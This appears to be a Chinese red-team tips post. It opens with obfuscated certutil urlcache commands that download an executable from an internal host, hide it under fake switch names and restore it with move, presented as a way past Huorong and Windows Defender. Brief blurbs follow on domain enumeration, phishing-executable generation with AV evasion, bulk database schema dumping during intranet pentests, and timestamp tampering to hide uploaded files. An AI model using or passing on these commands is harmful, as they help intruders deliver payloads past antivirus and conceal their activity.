Quan

结论：
;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deleteEccCurve
;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deletePolicyServer
;,@certutil  -u""r""l""c""a""c""h""e"" -split  -f http://192.168.xx.xx:7000/a.exe -deleteEnrollmentServer
;,@certutil  -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer
最后借用move命令还原：
move -DeleteHelloContainer a.exe
细节可见文章
火绒复制一个就行 Windows defender 混淆下命令就行

 总结一些域枚举的艺术，当我们在域内寸步难行的时候，或许枚举会告诉我们一些出路。

红队行动中利用白利用、免杀、自动判断网络环境生成钓鱼可执行文件，感觉这一套自动化实现还真不错，先Mark上

这工具真无敌了！
在内网渗透中快速获取数据库所有库名，表名，列名；具体判断后再去翻数据，节省时间。
工具支持mysql，mssql，PostgreSQL，redis并解析fscan扫描结果进行批量探测获取。

方便快捷的修改文件时间戳，方便隐藏我们上传的相关文件！